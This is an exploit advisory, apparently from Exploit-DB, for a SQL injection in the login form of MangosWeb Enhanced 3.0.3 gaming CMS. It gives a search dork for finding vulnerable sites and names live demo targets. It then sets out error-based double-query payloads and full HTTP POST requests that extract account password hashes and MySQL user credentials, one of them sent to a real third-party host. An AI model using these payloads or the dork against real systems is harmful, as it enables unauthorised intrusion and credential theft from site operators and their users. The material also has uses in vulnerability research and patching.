MangosWeb - SQL Injection

EDB-ID:

18335




Platform:

PHP

Date:

2012-01-08


EXPLOIT TITLE: MangosWeb SQL Vulnerability
DATE: 1/7/2012
BY Hood3dRob1n
AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3
SW LINK: http://code.google.com/p/mwenhanced/
CATEGORY: WebApp 0day
DORK: intext:MangosWeb ENhanced Version 3.0.3 @2009-2011, KeysWow Dev Team
TESTED ON: W7 & Backtrack 5
DEMO1: http://wowfaction.selfip.com/wow/
DEMO2: http://www.mojotrollz.eu/
DEMO3: http://h1987786.stratoserver.net:8096/
Greetz to: -DownFall, Zer0Pwn, zerofreak, ~!White!~, Dr. Hobo, ring0_, Pi  , and Greyerstring!

Found SQL vulnerabilities in this CMS whcih seems to affect a large amount of online gaming sites. There is a SQL injection vulnerability in the Login field of the login form located at the top of the site pages. If you inject a single apostrophe (') into this field and pass anything you want in password field you can trigger the SQL Error message. It requires the use of double-query injection, using string method, over POST request to exploit this vulnerability which can lead to extraction of user info as well as databse user credentials. You can use Tamper Data, Live HTTP Headers to replicate the results but AI find it easiest to perform this type of injection from Burp Suite...

Proof of Concept (PoC):
You need to first get the name of the current database using this syntax injected into the Login field:

'and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--+-

Once we have that we can grab the authorized user details with this syntax injected into Login:

'and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,id,0x3a,username,0x3a,sha_pass_hash,0x3a) FROM TableName.account+LIMIT+N,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-

NOTE: Replace the TableName with the results from the first injection, and then use the N position to enumerate the results for all entries. 

Extraction of MySQL User Credentials requires one to inject the following syntax into the Login field:

'and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-



Examples:
=====================================================================================================
POST /?p=account&sub=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/?p=server&sub=chars
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; cookies=true; menuCookie=1%201%200%200%200%201%200%200
Content-Type: application/x-www-form-urlencoded
Content-Length: 244

login='and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================
POST /?p=account&sub=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/?p=server&sub=chars
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; cookies=true; menuCookie=1%201%200%200%200%201%200%200
Content-Type: application/x-www-form-urlencoded
Content-Length: 244

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,id,0x3a,username,0x3a,sha_pass_hash,0x3a) FROM tbc_realm.account+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================
POST /wow/?p=account&sub=login HTTP/1.1
Host: wowfaction.selfip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://wowfaction.selfip.com/wow/
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; menuCookie=1%201%200%200%200%201%200%200; cookies=true; base_language_id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,insert_priv,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================
POST /?p=account&sub=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/?p=server&sub=chars
Cookie: Language=English; cur_selected_realm=1; cur_selected_theme=0; cookies=true; menuCookie=1%201%200%200%200%201%200%200
Content-Type: application/x-www-form-urlencoded
Content-Length: 273

login='and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,host,0x3a,user,0x3a,password,0x3a,insert_priv,0x3a,file_priv,0x3a,super_priv) FROM mysql.user+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)--+-&pass=fubar&action=login&x=0&y=0
=====================================================================================================